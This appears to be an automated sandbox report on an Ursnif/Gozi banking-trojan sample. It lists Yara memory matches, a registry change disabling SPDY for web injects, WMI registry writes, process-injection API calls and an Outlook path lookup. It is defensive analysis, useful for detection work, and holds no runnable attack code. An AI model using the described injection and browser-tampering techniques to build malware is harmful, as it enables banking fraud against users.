Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 8_2_010A7479

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304C124 2_2_0304C124
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304E56A 2_2_0304E56A
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_0304E570 2_2_0304E570
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_07C27060 2_2_07C27060
Source: C:\Users\user\Desktop\gozi.exe Code function: 2_2_07C26030 2_2_07C26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7F60 8_2_010A7F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A6B67 8_2_010A6B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A6DD3 8_2_010A6DD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F163BC 8_2_03F163BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1A241 8_2_03F1A241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1F1EE 8_2_03F1F1EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F178F1 8_2_03F178F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0C086 8_2_03F0C086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0504A 8_2_03F0504A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1CF97 8_2_03F1CF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F095FE 8_2_03F095FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F09D64 8_2_03F09D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F034DC 8_2_03F034DC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7AB44 28_2_00E7AB44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7B58C 28_2_00E7B58C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E686D0 28_2_00E686D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E640E8 28_2_00E640E8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E568FC 28_2_00E568FC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E54080 28_2_00E54080
Source: C:\Windows\System32\control.exe Code function: 28_2_00E53890 28_2_00E53890
Source: C:\Windows\System32\control.exe Code function: 28_2_00E79858 28_2_00E79858
Source: C:\Windows\System32\control.exe Code function: 28_2_00E68024 28_2_00E68024
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78820 28_2_00E78820
Source: C:\Windows\System32\control.exe Code function: 28_2_00E65828 28_2_00E65828
Source: C:\Windows\System32\control.exe Code function: 28_2_00E62804 28_2_00E62804
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6B008 28_2_00E6B008
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6A808 28_2_00E6A808
Source: C:\Windows\System32\control.exe Code function: 28_2_00E531D4 28_2_00E531D4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E66190 28_2_00E66190
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6194B 28_2_00E6194B
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5B154 28_2_00E5B154
Source: C:\Windows\System32\control.exe Code function: 28_2_00E75954 28_2_00E75954
Source: C:\Windows\System32\control.exe Code function: 28_2_00E652CC 28_2_00E652CC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E512BC 28_2_00E512BC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E67BFC 28_2_00E67BFC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E53BA4 28_2_00E53BA4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E72BA0 28_2_00E72BA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E72330 28_2_00E72330
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5DCA8 28_2_00E5DCA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6CCA8 28_2_00E6CCA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E644B4 28_2_00E644B4
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5C49C 28_2_00E5C49C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6BC10 28_2_00E6BC10
Source: C:\Windows\System32\control.exe Code function: 28_2_00E59DF0 28_2_00E59DF0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78DA0 28_2_00E78DA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7C588 28_2_00E7C588
Source: C:\Windows\System32\control.exe Code function: 28_2_00E77D6C 28_2_00E77D6C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E60544 28_2_00E60544
Source: C:\Windows\System32\control.exe Code function: 28_2_00E74530 28_2_00E74530
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6751C 28_2_00E6751C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5A6D0 28_2_00E5A6D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E77EA0 28_2_00E77EA0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E73E2C 28_2_00E73E2C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E61618 28_2_00E61618
Source: C:\Windows\System32\control.exe Code function: 28_2_00E737D0 28_2_00E737D0
Source: C:\Windows\System32\control.exe Code function: 28_2_00E78FA8 28_2_00E78FA8
Source: C:\Windows\System32\control.exe Code function: 28_2_00E57F64 28_2_00E57F64
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5CF44 28_2_00E5CF44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E69740 28_2_00E69740
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6FF4C 28_2_00E6FF4C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA986D0 36_2_0000020FDEA986D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAAB44 36_2_0000020FDEAAAB44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8A6D0 36_2_0000020FDEA8A6D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA812BC 36_2_0000020FDEA812BC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA952CC 36_2_0000020FDEA952CC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA7EA0 36_2_0000020FDEAA7EA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA37D0 36_2_0000020FDEAA37D0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9BC10 36_2_0000020FDEA9BC10
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA95828 36_2_0000020FDEA95828
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8820 36_2_0000020FDEAA8820
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA98024 36_2_0000020FDEA98024
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA97BFC 36_2_0000020FDEA97BFC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9B008 36_2_0000020FDEA9B008
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9A808 36_2_0000020FDEA9A808
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA92804 36_2_0000020FDEA92804
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA87F64 36_2_0000020FDEA87F64
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA2330 36_2_0000020FDEAA2330
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9FF4C 36_2_0000020FDEA9FF4C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA99740 36_2_0000020FDEA99740
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8CF44 36_2_0000020FDEA8CF44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8FA8 36_2_0000020FDEAA8FA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA2BA0 36_2_0000020FDEAA2BA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA83BA4 36_2_0000020FDEA83BA4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA940E8 36_2_0000020FDEA940E8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA944B4 36_2_0000020FDEA944B4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9751C 36_2_0000020FDEA9751C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA868FC 36_2_0000020FDEA868FC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA9858 36_2_0000020FDEAA9858
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8C49C 36_2_0000020FDEA8C49C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA83890 36_2_0000020FDEA83890
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8DCA8 36_2_0000020FDEA8DCA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9CCA8 36_2_0000020FDEA9CCA8
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA84080 36_2_0000020FDEA84080
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA831D4 36_2_0000020FDEA831D4
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA91618 36_2_0000020FDEA91618
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA3E2C 36_2_0000020FDEAA3E2C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA89DF0 36_2_0000020FDEA89DF0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA8B154 36_2_0000020FDEA8B154
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA5954 36_2_0000020FDEAA5954
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA7D6C 36_2_0000020FDEAA7D6C
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA4530 36_2_0000020FDEAA4530
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9194B 36_2_0000020FDEA9194B
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA90544 36_2_0000020FDEA90544
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA96190 36_2_0000020FDEA96190
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA8DA0 36_2_0000020FDEAA8DA0
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAC588 36_2_0000020FDEAAC588
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAAB58C 36_2_0000020FDEAAB58C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030463BC 47_2_030463BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304A241 47_2_0304A241
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304F1EE 47_2_0304F1EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303504A 47_2_0303504A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303C086 47_2_0303C086
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030478F1 47_2_030478F1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304CF97 47_2_0304CF97
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03039D64 47_2_03039D64
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030395FE 47_2_030395FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03055430 47_2_03055430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030334DC 47_2_030334DC
Contains functionality to launch a process as a different user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E6B9 CreateProcessAsUserA, 8_2_03F0E6B9
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 8_2_0040140F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040182F GetProcAddress,NtCreateSection,memset, 8_2_0040182F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00401ABC NtMapViewOfSection, 8_2_00401ABC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 8_2_010A231E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A5D85 GetProcAddress,NtCreateSection,memset, 8_2_010A5D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A60A0 NtMapViewOfSection, 8_2_010A60A0
